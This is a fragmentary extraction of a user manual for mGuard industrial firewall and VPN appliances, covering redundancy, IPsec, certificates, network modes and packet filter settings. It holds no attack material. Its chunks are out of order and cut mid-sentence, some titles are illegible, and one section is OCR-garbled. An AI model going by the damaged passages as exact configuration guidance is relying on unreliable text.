403. t even under high load. Redundancy. 16.2.9 Limits of VPN redundancy: The limits documented above for firewall redundancy also apply to VPN redundancy (see "Limits of firewall redundancy" on page 344). Further restrictions also apply. The redundant pair must have the same configuration with respect to the following: general VPN settings; each individual VPN connection. The mGuard only accepts VPN connections on the first virtual IP address. In Router network mode this means the first internal IP address and the first external IP address. The following features cannot be used with VPN redundancy: dynamic activation of the VPN connections using a VPN switch or the CGI script command nph-vpn.cgi (only on mGuard rs4000 3G and mGuard rs4000); archiving of diagnostic messages for VPN connections. VPN connections are only supported in Tunnel mode. Transport mode does not take sufficient account of VPN connections. The upper limit of the fail-over switching time does not apply to connections which are encapsulated with TCP. Connections of this type are interrupted for a prolonged period during a fail-over. The encapsulated TCP connections must be reestablished by the initiating side after each fail-over. If the fail-over occurred on the initiating side, they can start immediately after the transfer. However, if the fail-over occurred on the answering
404. t gt Firewall Users gt gt Firewall Users Authentication Method Local DB when Local DB is selected the password assigned to the user must be entered in the User Password column in addition to the User Name that must be entered on login RADIUS if RADIUS is selected the user password can be stored on the RADIUS server User Password Only active if Local DB is selected as the authentication method 7 2 2 Access Authentication Firewall Users Firewall Users Access Status HTTPS Authentication via x Interface F DMZ z External2 w Internal w Es Dian v Authentication gt gt Firewall Users gt gt Access Authentication via HTTPS NOTE For authentication via an external interface please consider the follow ing If a firewall user can log in via an unsecure interface and the user leaves the session without logging out correctly the login session may remain open and could be misused by another unauthorized person An interface is unsecure for example if a user logs in via the Internet from a location or a computer to which the IP address is assigned dynamically by the Internet service pro vider this is usually the case for many Internet users If such a connection is temporarily interrupted e g because the user logged in is being assigned a different IP address this user must log in again However the old login session under the old IP address remains open This
405. t a maintenance center to which mGuard devices establish a VPN connection, Wait must be specified. IPsec VPN >> Connections >> Edit >> General. Transport and Tunnel Settings. Enabled (Yes/No): Specify whether the connection channel should be active (Yes) or not (No). Comment: Freely selectable comment text. Can be left empty. Protocol: All means TCP, UDP, ICMP and other IP protocols. Type: The following can be selected: Tunnel (network <-> network), Transport (host <-> host). Tunnel (network <-> network): This connection type is suitable in all cases and is also the most secure. In this mode, the IP datagrams to be transmitted are completely encrypted and are transmitted, with a new header, to the VPN gateway of the partner, the tunnel end. The transmitted datagrams are then decrypted and the original datagrams are restored. These are then forwarded to the destination computer. Transport (host <-> host): For this type of connection, only the data of the IP packets is encrypted. The IP header information remains unencrypted. When you switch to Transport, the following fields (apart from Protocol) are hidden, as these parameters are omitted. IPsec VPN menu
406. t empty, then any subject entries are permitted in the machine certificate shown by the VPN partner. It is then no longer necessary to identify or define the subject in the certificate. Limited access to certain subjects: In the certificate, the certificate owner is specified in the Subject field. The entry is comprised of several attributes. These attributes are either expressed as an object identifier (e.g. 1382.3.7.32.1) or, more commonly, as an abbreviation with a corresponding value. Example: CN=VPN endpoint 01, O=Smith and Co, C=US. If certain subject attributes have very specific values for the acceptance of the VPN partner by the mGuard, then these must be specified accordingly. The values of the other freely selectable attributes are entered using the asterisk wildcard (*). Example: CN=*, O=Smith and Co, C=US (with or without spaces between attributes). In this example, the attributes O=Smith and Co and C=US should be entered in the certificate that is shown under Subject. It is only then that the mGuard would accept the certificate owner (Subject) as a communication partner. The other attributes in the certificates to be filtered can have any value. Please note the following when setting a subject filter: The number and the order of the attributes must correspond to that of the certificates for which the filter is used. Please note this is case-sensitive.
407. t for mobile phone and positioning functions (see "Network >> Mobile Network" on page 168). Support for integrated managed and unmanaged switches (see "Network >> Ethernet" on page 148). Support for a dedicated DMZ port (only mGuard rs4000 3G): The DMZ port can be set so that it forwards packets to the internal, external or secondary external interface. The DMZ port is only supported in router mode and requires at least one IP address and a corresponding subnet mask. The DMZ does not support any VLANs. Removed functions: HiDiscovery support. The Accept button, which accepts changes for the current page only, has been removed. Changes are made across all pages. Changes compared to the previous version. 3.2.1 New in CIFS Integrity Monitoring (items: Time schedule; Extended display of the current status; Status of the VPN extensions; Unique names; Timeout for the VPN connection; Source-based routing). Time schedule: The time schedule has been improved in Version 8.0. Now more than one scan per day is possible. Continuous scanning can also be set. If the scan takes longer than planned, it is aborted. However, you can adjust the settings so that a scan is started regularly. Extended display of the current status: Each row of the CIFS Integrity Monitoring also indicates the following information: the status of the scanned importable shares; the result of the last scan or the progress of the cur
408. t set there for the partner. The data packets of local devices are assigned a source address according to the address set under Local and are transmitted via the VPN tunnel. After clicking on the More button, 1:1 NAT rules can be specified for each VPN tunnel for local devices. In this way, an IP range that is distributed over a wide network can be gathered and sent through a narrow tunnel. IPsec VPN >> Connections >> Edit >> General, Type: Tunnel, Local: 1:1 NAT (More button). Local NAT: Local NAT for IPsec tunnel connections (internal network address). Real network: Configures the From IP address for 1:1 NAT. Virtual Network: Configures the translated IP address for 1:1 NAT. Netmask: The subnet mask as a value between 1 and 32 for the real and virtual network address (see also "CIDR (Classless Inter-Domain Routing)" on page 24). Comment: Can be filled with appropriate comments. Local 1:1 networks must be specified in ascending order, beginning with the smallest network up to the largest network. Type: Tunnel, Local: Masquerade. If local devices transmit data packets, only those
409. ...(title illegible) 195
7.4.2 Machine Certificates 197
7.4.3 CA Certificates 199
7.4.4 Remote Certificates 201
7.4.5 (title illegible) 203
8 Network Security Menu 205
8.1 Network Security >> Packet Filter 205
8.1.1 Incoming Rules 206
8.1.2 Outgoing Rules 208
8.1.3 DMZ 210
8.1.4 Rule Records 212
8.1.5 MAC Filtering 215
8.1.6 Advanced 216
8.1.7 Firewall for the mGuard rs2000 3G 222
8.2 Network Security >> DoS Protection 223
8.2.1 Flood Protection 223
8.3 Network Security >> User Firewall 225
8.3.1 User Firewall Templates 225
9 CIFS Integrity Monitoring Menu 229
9.1 CIFS Integrity Monitoring >> Importable Shares 230
9...
410. ...tantly, this will not be possible. This problem can be avoided if the operator of the computer has an account with a DynDNS provider (DNS = Domain Name Server). In this case, the operator can set a host name with this provider via which the computer should be accessible, e.g. www.example.com. The DynDNS provider also provides a small program that must be installed and run on the computer concerned. Every time a new Internet session is launched on the local computer, this tool sends the IP address used by the computer to the DynDNS provider. The domain name server registers the current assignment of the host name to the IP address and also informs the other domain name servers on the Internet accordingly.

If a remote computer now wishes to establish a connection to a computer that is registered with the DynDNS provider, then the remote computer can use the host name of the computer as the address. This establishes a connection to the responsible DNS in order to look up the IP address that is currently registered for this host name. The corresponding IP address is sent back from the DNS to the remote computer, which can then use it as the destination address. This now leads directly to the desired computer.

In principle, all Internet addresses are based on this procedure: first, a connection to a DNS is established in order to determine the IP address assigned to the host name. Once this has been accomplished, the established IP address is us...
411. ...te is needed here if and only if it is self-signed. Otherwise, the certificate of the CA which issued the server's certificate must be installed. [Screenshot: "No Certificate installed", Browse...]

The mGuard can retrieve new configuration profiles from an HTTPS server in adjustable time intervals, provided that the server makes them available to the mGuard as files (file extension .atv). If the configuration provided differs from the active configuration of the mGuard, the available configuration is automatically downloaded and activated.

Management >> Central Management >> Configuration Pull

Configuration Pull

Pull Schedule: Here, specify whether and, if so, when and at what intervals the mGuard should attempt to download and apply a new configuration from the server. To do this, open the selection list and select the desired value. A new field is shown when Time Schedule is selected. In this field, specify whether the new configuration should be downloaded from the server daily or regularly on a certain weekday, and at what time. Time-controlled download of a new configuration is only possible if the system time has been synchronized (see Management >> System Settings on page 33, Time and Date on page 35). Time control sets the selected time based on the configured time zone.

Server: IP address or host name of the server that provides the configurations.
412. ...te settings. Tabs: Machine Certificates, CA Certificates, Remote Certificates, CRL.

[Screenshot: Trusted CA Certificates, with an example entry: Subject CN=VPN-RootCA-01, O=BeispielLieferant, C=DE; Subject Alternative Names; Issuer CN=VPN-RootCA-01, O=BeispielLieferant, C=DE; Validity from Mar 20 15:56:38 2007 GMT to Mar 20 15:56:38 2022 GMT; MD5 and SHA1 fingerprints; Shortname VPN-RootCA-01; Upload Certificate (Filename, Browse..., Import); Download Certificate]

Authentication >> Certificates >> CA Certificates

Trusted CA Certificates: Displays the current imported CA certificates. To import a new certificate, proceed as follows.

Importing a CA certificate: The file (file name extension .cer, .pem or .crt) is saved on the connected computer. Proceed as follows:
• Click on Browse... to select the file.
• Click on Import. Once imported, the loaded certificate appears under Certificate.
• Save the imported certificate by clicking on Apply.

Shortname: When importing a CA certificate, the CN attribute from the certificate subject field is suggested as the short name here, providing the Shortname field is empty at this point. This name can be adopted or another name can be chosen.
• You must assign a name. The name must be unique.

Using the short name: During the c...
413. ...te synchronization can contain a maximum of ten targets.

Secondary targets for ICMP echo requests: See above. Only used if the check of the primary targets has failed. Failure of a secondary target is not detected in normal operation. Default: 10.0.0.30, 10.0.0.31 for new addresses. Each set of targets for state synchronization can contain a maximum of ten targets.

Internal interface

Kind of check: Specifies whether a connectivity check is performed on the internal interface and, if so, how. The settings are the same as those for the external interface.

Primary targets for ICMP echo requests: See above. Factory default: 192.168.1.30, 192.168.1.31 for new addresses.

Secondary targets for ICMP echo requests: See above. Factory default: 192.168.1.30, 192.168.1.31 for new addresses.

Redundancy menu

13.2 Redundancy >> FW Redundancy Status

13.2.1 Redundancy Status

[Screenshot: Redundancy >> FW Redundancy Status >> Redundancy Status. Current State: (illegible) Wed Nov 9 11:59:13 CET 2011. Status of the Components: Availability Check: Received no CARP announcements from another mGuard, Wed Oct 26 15:49:20 CEST 2011; Availability Check per (illegible): Received no CARP announcements from another mGuard, Wed Oct 26 15:49:19 CEST 2011; Availability Check, Interface for State Synchronization: Received no CARP announcements from another mGuard, Wed Oct 26 15:49:20 CEST...]
414. ...tealth, Router. The mGuard must be set to the network mode that corresponds to its connection to the network. Depending on which network mode the mGuard is set to, the page will change together with its configuration parameters. The Stealth network mode is not available for the mGuard rs2000 3G, as it does not have a wired WAN interface.

Stealth (default setting: mGuard rs4000/rs2000, mGuard industrial rs, mGuard smart, mGuard pci SD, mGuard pcie SD, mGuard pci, mGuard delta, EAGLE mGuard): See Stealth on page 108 and Network Mode Stealth on page 112.

Router (default setting: mGuard rs4000/rs2000 3G, mGuard centerport, mGuard blade controller, mGuard delta): See Router on page 109 and Network Mode Router on page 123.

Router Mode (static, DHCP, PPPoE, PPTP, Modem, Built-in Modem, Built-in mobile network modem): See Router Mode static on page 110 and Router network mode, PPTP router mode on page 128; Router Mode DHCP on page 110 and Router network mode, DHCP router mode on page 126; Router Mode PPPoE on page 110 and Router network mode, PPPoE router mode on page 127; Router Mode PPTP on page 110 and Router network mode, PPTP router mode on page 128; Router Mode Modem on page 111 and Router network mode, Modem router mode on page 129.

Modem, Built-in modem, Built-in mobile network modem: is not available for all mGuard...
415. ...ted to the telephone network (fixed-line or GSM network). The connection to the telephone network is established via the terminal strip on the bottom of the device for the mGuard industrial rs with built-in modem or ISDN terminal adapter. This enables a remote PC that is also connected to the telephone network via a modem or ISDN adapter to establish a PPP (Point-to-Point Protocol) dial-up line connection to the mGuard.

This method is referred to as a PPP dial-in option. It can be used for access to the LAN which is located behind the mGuard or for configuration of the mGuard. "Dial-in" is the interface definition used for this connection type in firewall selection lists.

In order to access the LAN with a Windows computer using the dial-up line connection, a network connection must be set up on this computer in which the dial-up line connection to the mGuard is defined. In addition, the IP address of the mGuard or its host name must be defined as the gateway for this connection so that the connections to the LAN can be routed via this address. To access the web configuration interface of the mGuard, you must enter the IP address of the mGuard or its host name in the address line of the web browser.

The serial interface of the mGuard is connected to the serial interface of a PC. On the PC, the connection to the mGuard is established using a terminal program and the configuration is imple...
416. ...ted in PPPoE mode, NAT must be activated in order to gain access to the Internet. If NAT is not activated, it is possible that only VPN connections can be used. For the further configuration of PPPoE network mode, see Router network mode, PPPoE router mode on page 127.

Router Mode PPTP: Similar to PPPoE mode. For example, in Austria the PPTP protocol is used instead of the PPPoE protocol for DSL connections. PPTP is the protocol that was originally used by Microsoft for VPN connections. If the mGuard is operated in PPTP mode, the mGuard must be set as the default gateway on the locally connected computers. This means that the IP address of the mGuard LAN port must be specified as the default gateway on these computers. If the mGuard is operated in PPTP mode, NAT should be activated in order to gain access to the Internet from the local network (see Network >> NAT on page 152). If NAT is not activated, it is possible that only VPN connections can be used. For the further configuration of PPTP network mode, see Router network mode, PPTP router mode on page 128.

Network menu

Router Mode Modem (only for mGuard rs4000/rs2000, mGuard rs4000/rs2000 3G, mGuard centerport, mGuard industrial rs, mGuard blade, mGuard delta, EAGLE mGuard): If Modem network mode is selected, the external Ethernet interface...
417. ...ted on the mGuard rs4000/rs2000 3G. AT&T 3G (US): in the USA, mobile network connection via AT&T.

Network >> Mobile Network >> General

Radio settings

GSM Frequencies: Default: World (all frequencies). Options: GSM off; Europe/Asia 900/1800 MHz; North America 850/1900 MHz; Europe/Asia 900 MHz; Europe/Asia 1800 MHz; North America 850 MHz; North America 1900 MHz.

3G/UMTS Frequencies: Default: World (all frequencies). Options: UMTS off; World 850/1900/2100 MHz; North America 850/1900 MHz; Europe/Asia 2100 MHz; Other countries 850/2100 MHz; North America 850 MHz; North America 1900 MHz; World 800 MHz; World 900 MHz.

CDMA Frequencies: Default: CDMA 800/1900 MHz. Options: CDMA off; CDMA 800 MHz; CDMA 1900 MHz; CDMA 800/1900 MHz.

Connection Supervision

Daily relogin: The connection to the mobile network provider is renewed daily at a specified time. Otherwise, the mobile network operator regularly resets the connection from their side. Default: No.

Daily relogin at: Time at which the connection is renewed. The entry Yes must be selected under Daily relogin for this to take effect. For this to work correctly, the time must be successfully synchronized (realtime clock, NTP server, GPS/GLONASS). Default: 0h 00m. Values: 0 to 23 hours and 0 to 59 minutes.
418. ...tered values on a configuration page and these have not yet taken effect by clicking on the Apply button, you can restore the original values on the page by clicking the Reset button.

Apply: To apply the settings on the device, you must click on the Apply button. This applies across all pages.

Working with sortable tables

Many settings are saved as data records. Accordingly, the adjustable parameters and their values are presented in the form of table rows. If multiple firewall rules are defined, these are queried starting from the top of the list of entries until an appropriate rule is found. Therefore, note the order of the entries if necessary. The order can be changed by moving table rows up or down.

With tables you can: insert rows to create a new data record with settings (e.g. the firewall settings for a specific connection); move rows, i.e. resort them; delete rows to delete the entire data record.

Inserting rows: [Screenshot]
2. The new row is inserted. You can now enter or specify values in the row.

Moving rows: [Screenshot]
3. The rows are moved.

Deleting rows: [Screenshot]
1. Select the rows you want to delete.
2. Click on x to delete the rows.
3. The rows are deleted.

Configuration help
419. ...terface can also be configured (see Secondary External Interface on page 116). For the further configuration of Stealth network mode, see Network Mode Stealth on page 112.

Network menu

Router (default setting: mGuard rs4000/rs2000 3G, mGuard centerport, mGuard blade controller, mGuard delta): If the mGuard is in Router mode, it acts as the gateway between various subnetworks and has both an external interface (WAN port) and an internal interface (LAN port) with at least one IP address.

WAN port: The mGuard is connected to the Internet or other external parts of the LAN via its WAN port. (mGuard smart: the WAN port is the Ethernet socket.)

LAN port: The mGuard is connected to a local network or a single computer via its LAN port. (mGuard smart: the LAN port is the Ethernet connector. mGuard pci in driver mode: the LAN port is represented by the network interface of the operating system that has the network card; operating system in this example: mGuard pci. In Power-over-PCI mode, the LAN port is the LAN socket of the mGuard pcie SD, mGuard pci SD or mGuard pci.)

As in the other modes, firewall and VPN security functions are available. If the mGuard is operated in Router mode, it must be set as the default gateway on the locally connected computers. This means that the IP address of the mGuard LAN port must be specified as the default gatew...
420. ...tes the relevant template.

Name: Name of the template. The name is specified when the template is created.

Network Security >> User Firewall >> User Firewall Templates

General: The following tab page appears when you click on Edit. Tabs: General, Template users, Firewall rules.

[Screenshot: Options. Template name BluePrint; Enabled: Yes; Comment; Timeout; Timeout type: static (Seconds); VPN connection]

Options

A descriptive name for the template: The user firewall template can be freely named and renamed.

Enabled: Yes/No. When set to Yes, the user firewall template becomes active as soon as firewall users log into the mGuard who are listed on the Template users tab page (see below) and who have been assigned this template. It does not matter from which computer and under what IP address the user logs in. The assignment of the firewall rules to a user is based on the authentication data that the user enters during login (user name, password).

Comment: Optional explanatory text.

Timeout: Default: 28800. Specifies the time in seconds at which point the firewall rules are deactivated. If the user session lasts longer than the timeout time specified here, the user has to log in again.

Network Security menu

Network Security >> User Firewall >> ...
421. ...teway for explicit static routes for devices located in the same Ethernet segment as the external network interface of the mGuard. The active mGuard can receive ICMP queries via this IP address. It reacts to these ICMP requests depending on the menu settings under Network Security >> Packet Filter >> Advanced.

No subnet masks or VLAN IDs are set up for the virtual IP addresses, as these attributes are defined by the actual external IP address. For each virtual IP address, an actual IP address must be configured whose IP network accommodates the virtual address. The mGuard transmits the subnet mask and VLAN setting from the actual external IP address to the corresponding virtual IP address. The applied VLAN settings define whether standard MTU settings or VLAN MTU settings are used for the virtual IP address. Firewall redundancy cannot function correctly if no actual IP address and subnet mask are available.

Redundancy >> Firewall Redundancy >> Redundancy

Internal virtual Router ID: 1, 2, 3 ... 255 (default: 51). Only in Router network mode. This ID is sent by the redundant pair with each presence notification (CARP) via the external and internal interface and is used to identify the redundant pair. This ID must be set so it is the same for both mGuard devices. It is used to differentiate the redundant pair from other Ethernet...
422. ...tgoing connections. If no rule is defined, all outgoing connections are prohibited (excluding VPN).

General firewall setting: Allow all outgoing connections: the data packets of all outgoing connections are allowed. Drop all outgoing connections: the data packets of all outgoing connections are discarded. Accept Ping only: the data packets of all outgoing connections are discarded, except for ping packets (ICMP). Use the firewall ruleset below: displays further setting options. This menu item is not included in the scope of functions for the mGuard rs2000 3G and mGuard rs2000.

The following settings are only visible if Use the firewall ruleset below is set.

Protocol: All means TCP, UDP, ICMP, GRE and other IP protocols.

From IP / To IP: 0.0.0.0/0 means all IP addresses. To specify an address area, use CIDR format (see CIDR (Classless Inter-Domain Routing) on page 24).

From Port / To Port: Only evaluated for TCP and UDP protocols. any refers to any port. startport:endport (e.g. 110:120) refers to a port area. Individual ports can be specified using the port number or the corresponding service name (e.g. 110 for pop3, or pop3 for 110).

Network Security menu

Network Security >> Packet Filter >> Outgoing Rules

Action: Accept means that the data packets may pass through. Reject means that the data packets are sent back and the sender is...
423. ...the performance of the mGuard and VPN partners and the latency of the mGuard devices on the network. If this is not feasible for redundancy, the VPN partners of a redundant pair must be configured so that they accept all certificates whose validity is confirmed by a set of specific CA certificates (see CA Certificates on page 199 and Authentication on page 269). To do this, select Signed by any trusted CA under IPsec VPN >> Connections >> Edit >> Authentication, Remote CA Certificate.

If the new machine certificate is issued from a different sub-CA certificate, the VPN partner must be able to recognize this before the redundant pair can use the new machine certificate.

The machine certificate must be replaced on both mGuard devices in a redundant pair. However, this is not always possible if one cannot be reached. This might be the case in the event of a network failure, for example. The mGuard on standby may then have an obsolete machine certificate when it becomes active. This is another reason for setting the VPN partners so that they use both machine certificates.

The machine certificate is normally also replicated with the corresponding key during VPN state synchronization. In the event of a fail-over, the other mGuard can take over and even continue establishing incomplete ISAKMP SAs.

Switching the remote certificates for a VPN connection: The mGuard can be set to authenticate VPN partners directly us...
424. ...thernet multicasts (layer 2). Tables of systems connected to the network are created from the responses, and these can be requested via SNMP.

Management >> SNMP >> LLDP

LLDP Mode: Enabled/Disabled. The LLDP service or agent can be globally enabled or disabled here. If the function is enabled, this is indicated by a green signal field on the tab at the top of the page. If the signal field is red, the function is disabled.

Internal (LAN interface) / External (WAN interface)

Chassis ID: A unique ID of the computer found, typically one of its MAC addresses.

IP address: IP address of the computer found. This can be used to perform administrative activities on the computer via SNMP.

Port description: A textual description of the network interface where the computer was found.

System name: Host name of the computer found.

Button Update: To update the displayed data if necessary, click on Update.

Management menu

4.6 Management >> Central Management

4.6.1 Configuration Pull

[Screenshot: Management >> Central Management >> Configuration Pull. Pull Schedule: Never; Server: config.example.com; Port: 445; Directory; Filename (if empty, 1A715030.atv will be used); Number of times a configuration profile is ignored after it was rolled back: 2; Download timeout (seconds): 120; Login: anonymous; Password]

The server's certifica...
425. ...[Screenshot: Primary SIM slot: Activation: Enabled; State: SIM tray inserted; PIN of the SIM card; Roaming: Yes; Access Point Name: APN of the Provider; PPP authentication: No. Secondary SIM slot: Activation: Enabled; State: SIM tray inserted; Roaming: Yes/No; 0 hours]

Network >> Mobile Network >> SIM Settings

Current SIM Slot: Indicates whether SIM 1 or SIM 2 is used.

State: Indicates the state of the SIM card: SIM state unknown; SIM inserted and authorized; Invalid SIM; SIM inserted; No SIM found.

Roaming: If roaming is enabled, a mobile network device can also dial into another network. Here, the mobile network that the mGuard has dialed into is displayed: Not registered (the mGuard has not dialed into any mobile network); Registered to home network (the mGuard has dialed into the mobile network provided); Registered to foreign network (the mGuard has registered with a foreign mobile network).

Current Provider: Name of the mobile network provider in use.

Primary SIM slot

Activation: You can prevent or enable the use of the SIM card.

State: SIM tray inserted without SIM card; No SIM tray (neither the SIM card nor tray are available); Wrong PIN; PIN required; PUK required (if the PIN is incorrectly entered too often); SIM error (the SIM card could not be accessed); SIM ready (the SIM card can be p...
426. ...tion for firewall state synchronization. As an ancillary effect, the status indicator of the VPN connection can also be seen on the mGuard on standby. You can therefore find the contents of the VPN state database replicated under the normal status indicator for the VPN connection under IPsec VPN >> IPsec Status. Only the state of the synchronization process is shown in the status indicator for firewall redundancy (Redundancy >> FW Redundancy Status >> Redundancy Status).

16.2.2 Interaction of the VPN redundancy components

The individual components interact in the same way as described for firewall redundancy. VPN state synchronization is also controlled by state monitoring. The state is recorded and updates are sent. Certain conditions must be met for the states to occur. VPN state synchronization is taken into account here.

16.2.3 Error compensation through VPN redundancy

VPN redundancy compensates for the exact same errors as firewall redundancy (see Error compensation through firewall redundancy on page 337). However, the VPN section can hinder the other VPN gateways in the event of a network lobotomy. The independent mGuard devices then have the same virtual IP address for communicating with the VPN partners. This can result in VPN connections being established and disconnected in quick succession.

16.2.4 Setting the variables
427. ...tners. A message encrypted with the public key can only be decrypted and read by the owner of the associated private key. A message encrypted with the private key can be decrypted by any recipient in possession of the associated public key. Encryption using the private key shows that the message actually originated from the owner of the associated public key. Therefore, the expression "digital signature" is also often used.

However, asymmetrical encryption methods such as RSA are both slow and susceptible to certain types of attack. As a result, they are often combined with some form of symmetrical encryption (see Symmetrical encryption on page 364). On the other hand, concepts are available enabling the complex additional administration of symmetrical keys to be avoided.

This symmetrical encryption algorithm (see Symmetrical encryption on page 364) was developed by IBM and checked by the NSA. DES was specified in 1977 by the American National Bureau of Standards (the predecessor of the National Institute of Standards and Technology, NIST) as the standard for American governmental institutions. As this was the very first standardized encryption algorithm, it quickly won acceptance in industrial circles both inside and outside America. DES uses a 56-bit key length, which is no longer considered secure, as the available processing power of computers has greatly increased since 1977. 3DES is a version of DES. It uses keys that...
428. ...[Screenshot: Network Status: ...troute via 10.0.0.253; Used DNS servers: DNS Root Servers; Internal modem: Offline. Network Mode: Router; Router Mode: static. External Networks: 10.0.0.152 / 255.255.255.0, Use VLAN: No; IP of default gateway: 10.0.0.253]

Network >> Interfaces >> General (Router network mode, static router mode)

External Networks

External IPs: The addresses via which the mGuard can be accessed by devices on the WAN port side (untrusted port). If the transition to the Internet takes place here, the external IP address of the mGuard is assigned by the Internet service provider (ISP).

IP / Netmask: IP address and subnet mask of the WAN port.

Use VLAN: Yes/No. If the IP address should be within a VLAN, set this option to Yes.

VLAN ID: A VLAN ID between 1 and 4095. An explanation can be found under VLAN on page 364. If you want to delete entries from the list, please note that the first entry cannot be deleted.

Additional External Routes: In addition to the default route via the default gateway specified below, additional external routes can be specified. Network, Gateway: see Network example diagram on page 25.

Internal modem: Displays the status of the internal modem (mobile network modem of the mGuard rs4000/rs2000 3G and the internal analog modem for the mGuard industrial rs).
429. ...ts partner, thus allowing communication with B. A has previously received a copy of the certificate from B (e.g. by data carrier or e-mail) which B will use to identify itself to A. A can then verify that the certificate shown by B actually belongs to B by comparing it with this copy. With regard to the mGuard interface, the certificate copy given here by partner B to A is an example of a remote certificate.

For reciprocal authentication to take place, both partners must thus provide the other with a copy of their certificate in advance in order to identify themselves. A installs the copy of the certificate from B as its remote certificate. B then installs the copy of the certificate from A as its remote certificate.

Never provide the PKCS#12 file (file name extension .p12) as a copy of the certificate to the partner in order to use X.509 authentication for communication at a later time. The PKCS#12 file also contains the private key that must be kept secret and must not be given to a third party (see Creation of certificates on page 192).

To create a copy of a machine certificate imported in the mGuard, proceed as follows:
• On the Machine Certificates tab page, click on Current Certificate File next to the Download Certificate row for the relevant machine certificate (see Machine Certificates on page 197).

The certificate shown by a partner can also be checked by the mGuard in a different way, i.e. not by consulting the l...
430. ...tus: No (default): firewall redundancy is disabled. Yes: firewall redundancy is enabled. This function can only be activated when a suitable license key is installed. Further conditions apply if VPN redundancy is to be enabled at the same time (see VPN redundancy on page 345).

Maximum time that is allowed to elapse in the event of errors before switching to the other mGuard: 0 to 10000 milliseconds (default: 0). Time the redundancy system ignores an error: the connectivity and availability checks ignore an error until it is still present after the time set here has elapsed.

high/low: Specifies the priority associated with the presence notifications (CARP). Set the priority to high on the mGuard that you want to be active. The mGuard on standby is set to low. Both mGuard devices in a redundant pair may either be set to different priorities or be assigned the high priority. Never set both mGuard devices in a redundant pair to low priority.

Redundancy menu

Redundancy >> Firewall Redundancy >> Redundancy

Passphrase for availability checks: On an mGuard which is part of a redundant pair, checks are constantly performed to determine whether an active mGuard is available and whether it should remain active. A variation of the CARP (Common Address Redundancy Protocol) is used here. CARP uses SHA-1 HMAC encryption together with a password. This password must be set so it is the same for bot...
431. ...Management >> Central Management >> Configuration Pull

Directory: The directory (folder) on the server where the configuration is located.

Filename: The name of the file in the directory defined above. If no file name is defined here, the serial number of the mGuard is used with file extension .atv.

Number of times a configuration profile is ignored after it was rolled back: Default: 10. After retrieving a new configuration, it is possible that the mGuard may no longer be accessible after applying the new configuration. It is then no longer possible to implement a new remote configuration to make corrections. In order to prevent this, the mGuard performs the following check: As soon as the retrieved configuration is applied, the mGuard tries to connect to the configuration server again based on the new configuration. It then attempts to download the newly applied configuration profile again. If successful, the new configuration remains in effect. If this check is unsuccessful, for whatever reason, the mGuard assumes that the newly applied configuration profile is faulty. The mGuard remembers the MD5 sum for identification purposes. The mGuard then performs a rollback. Rollback means that the last working configuration is restored. This assumes that the new, non-functioning configuration contains an instruction to perform a rollback if a newly loaded configuration profile...
432. ...IPsec VPN >> Connections >> Edit >> Authentication

Authentication

Authentication method: Pre-Shared Secret (PSK)

[Screenshot: IPsec VPN >> Connections >> BluePrint, tabs General, Authentication, Firewall, IKE Options. Authentication method: Pre-Shared Secret (PSK); Pre-Shared Secret Key (PSK): complicated_like_SDy0qoD_and_long; ISAKMP Mode: Aggressive Mode (insecure), with the note "Please note that Aggressive Mode is vulnerable to attacks"; VPN Identifier: Local, Remote]

VPN Identifier: Local: By default, the IP address of the peer is used. Other possible settings are a hostname (hostname) or an e-mail address (name@hostname). Remote: By default, the IP address of the peer is used. Other possible settings are a hostname (hostname) or an e-mail address (name@hostname).

This method is mainly supported by older IPsec implementations. In this case, both sides of the VPN authenticate themselves using the same PSK. To make the agreed key available to the mGuard, proceed as follows:
• Enter the agreed string in the Pre-Shared Secret Key (PSK) entry field. To achieve security comparable to that of 3DES, the string should consist of around 30 randomly selected characters and should include upper and lower case characters and digits.

When PSK is used together with the Aggressive Mode (insecure) setting, a fixed Diffie-Hellman algorithm must be selected under IKE Options for the initiator of the connection. When PSK is used togeth...
subscriber can be dialed. Example: ATDOW765432

T (switch to tone dialing): Insert the special dial character T before the phone number if the faster tone dialing procedure is to be used with tone-compatible telephone connections. Example: ATDT765432

Authentication: PAP / CHAP / None. PAP = Password Authentication Protocol, CHAP = Challenge Handshake Authentication Protocol. These terms describe procedures for the secure transmission of authentication data using the Point-to-Point Protocol. If the Internet service provider requires the user to log in using a user name and password, then PAP or CHAP is used as the authentication method. The user name, password, and any other data that must be specified by the user to establish a connection to the Internet are given to the user by the Internet service provider. The corresponding fields are displayed depending on whether PAP, CHAP, or None is selected. Enter the corresponding data in these fields.

If authentication is via PAP: [Screenshot: Authentication: PAP; User name; Password; PAP server authentication: No; Dial on demand: Yes; Idle timeout: Yes; Idle time (seconds): 300; Local IP: 0.0.0.0; Remote IP: 0.0.0.0; Netmask: 0.0.0.0]

User name: User name specified during Internet service provider login to access the Internet.

Password: Password specified during Internet service provider login to access the Internet.

Network >> I
built-in ISDN terminal adapter of the mGuard. This must be connected to the telephone network. The connection to the Internet is then established via the telephone network. After selecting Built-in modem, the fields for specifying the modem connection parameters are displayed. For the further configuration of Built-in modem (modem network mode), see "Router network mode (Modem router mode)" on page 129.

Router Mode: Built-in mobile network modem (mGuard rs4000/rs2000 3G only). If the Built-in mobile network modem is selected, data traffic is routed via the built-in mobile network modem instead of the WAN port of the mGuard. For the further configuration of Built-in modem (modem network mode), see "Router network mode (Modem router mode)" on page 129.

Network Mode: Stealth (default setting). mGuard rs4000/rs2000, mGuard industrial rs, mGuard smart, mGuard smart, mGuard pci SD, mGuard pcie SD, mGuard pci, mGuard delta, EAGLE mGuard.

[Screenshot: Network >> Interfaces. Network Status: External IP address 172.16.66.49, Active Default route 172.16.66.18, Used DNS servers 10.1.0.253. Network Mode: Stealth; Stealth configuration: autodetect]

When Stealth is selected as the network mode and static is selected for the Stealth configura

Autodetect: i
number is only to be used in the following scenario: an mGuard connected upstream of a machine must establish connections to two or more different maintenance centers and their mGuard devices with TCP encapsulation enabled.

UDP packets can be oversized if an IPsec connection is established between the participating devices via IKE and certificates are exchanged. Some routers are not capable of forwarding large UDP packets if they are fragmented over the transmission path (e.g. via DSL, in 1500-byte segments). Some faulty devices forward the first fragment only, resulting in connection failure. If two mGuard devices communicate with each other, it is possible to ensure at the outset that only small UDP packets are to be transmitted. This prevents packets from being fragmented during transmission, which can result in incorrect routing by some routers. If you want to use this option, set it to Yes. If this option is set to Yes, the setting only takes effect if the partner is an mGuard with installed firmware version 5.1.0 or later. In all other cases, the setting has no effect (negative or otherwise).

IPsec VPN >> Global >> Options

IPsec MTU (default is 16260): The option for avoiding oversized IKE data packets, which cannot be routed correctly on the transmission path by faulty routers, can also be applied for IPsec data packets. In order to remain below the upper limit of
